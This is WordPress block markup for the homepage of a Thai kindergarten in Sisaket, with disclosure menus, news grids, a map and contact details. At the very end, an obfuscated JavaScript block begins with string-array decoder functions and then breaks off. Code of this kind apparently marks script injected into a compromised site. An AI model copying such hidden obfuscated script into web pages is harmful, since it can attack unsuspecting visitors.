data-id=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1H4PRZlpAa4ZD6uq6Ew5Wx3nLXGcUNa09/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 